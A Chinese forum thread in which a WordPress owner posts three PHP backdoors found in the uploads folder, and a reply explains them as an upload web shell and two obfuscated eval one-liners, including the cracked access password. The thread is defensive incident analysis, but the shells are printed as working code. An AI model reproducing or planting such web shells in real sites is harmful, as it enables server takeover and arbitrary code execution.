一个 WordPress 站，疑似被传后门

今检查 wordpress 的上传目录wp-content/uploads

发现 3 个.php文件

第一个./2014/12/conf-72e 内容如下

<?php if(isset($_GET["ms-load"]) && md5($_GET["ms-load"])=="10c0d9d7dbb63d34fdb2cafee8782911"){
$p=$_SERVER["DOCUMENT_ROOT"];
$tyuf=dirname(__FILE__);
echo <<<HTML
<form enctype="multipart/form-data"  method="POST">
Path:$p<br>
<input name="file" type="file"><br>
To:<br>
<input size="48" value="$tyuf/" name="pt" type="text"><br>
<input type="submit" value="Upload">
HTML;
if (isset($_POST["pt"])){
$uploadfile = $_POST["pt"].$_FILES["file"]["name"];
if ($_POST["pt"]==""){$uploadfile = $_FILES["file"]["name"];}
if (copy($_FILES["file"]["tmp_name"], $uploadfile)){
echo"uploaded:$uploadfile";
echo"Size:".$_FILES["file"]["size"]."n";
}else {
print "Error:n";
}
}
}

第二个./2015/03/conf-72 内容如下

<?php isset($_POST['8rfhxs']) && ($www= $_POST['8rfhxs']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');

第三个./2015/07/cp1251-72 内容如下

<?php
    if(isset($_GET['8rfhxs']) && isset($_GET['catid'])){
	$id = $_GET['8rfhxs'];
	echo $catid = isset($_GET['catid'])?base64_decode($_GET['catid']):'';
	$s = '';
	foreach(array($id) as $v){
	    $s.=$v;
	}
	ob_start($s);
	if($catid){
	    echo $catid;
	}
	ob_end_flush();
}

这三个好像都和传入参数有关，但里面变量不少，尤其是第一个(看起来像是先检测传入参数的 MD5，如吻合，就 POST 站点根目录下的什么东西，也没体现到什么域名 /IP，看起来很像后门.)

上传时间都是 16 年 12 月，那时我已在上传目录的.htaccess添加了php_flag engine off，使这个目录下的 PHP 文件不被解析。

可能因此骇客没得手.

fucker

2017-08-28 09:20:16 +08:00

第一个文件是非常明显的带有身份验证的上传文件的后门脚本，
早先的黑客手段（也许现在也不过时吧）：
通常是利用 web 程序的上传点 /文件写入 /命令执行 /高权限注入等方式向服务器写入被称为“小马”的可执行脚本
这类脚本特征是体积小，能避开脚本层面的文件大小限制，以便上传体积更大功能更全的“大马”
第一个文件中的 MD5：10c0d9d7dbb63d34fdb2cafee8782911 解密结果为：8rfhxs
与后两个文件对比，可以断定是同一名黑客所为
至于你所说的 ms-load 是某某组件，catid 又是某某 CMS 的变量
这样说有点狭隘，因为木马是可以伪装的，而变量名的选用也是自由的。
catid 就可以理解为 category id 吧，我相信不少开发人员开发数据库都会用 catid 做分类 ID 使用。
偷偷说一下，我自己就这么用过。
判断是不是木马，不是看它和别的程序 /组件 /插件 /代码的相似性，而是要从它的功能来判断
第二个文件是一个比较经典的“一句话木马”
其中用 rot13 转换了 riny 为 eval，其目的是为了执行任意 php 代码。
第三个文件,也很明显，是一个绕过 XX 盾之类安全防护软件的变形 php 一句话木马
其目的也是为了执行任意 php 代码。

简而言之，都是后门，虽然暂时看起来没什么影响，不过还是赶快补补吧。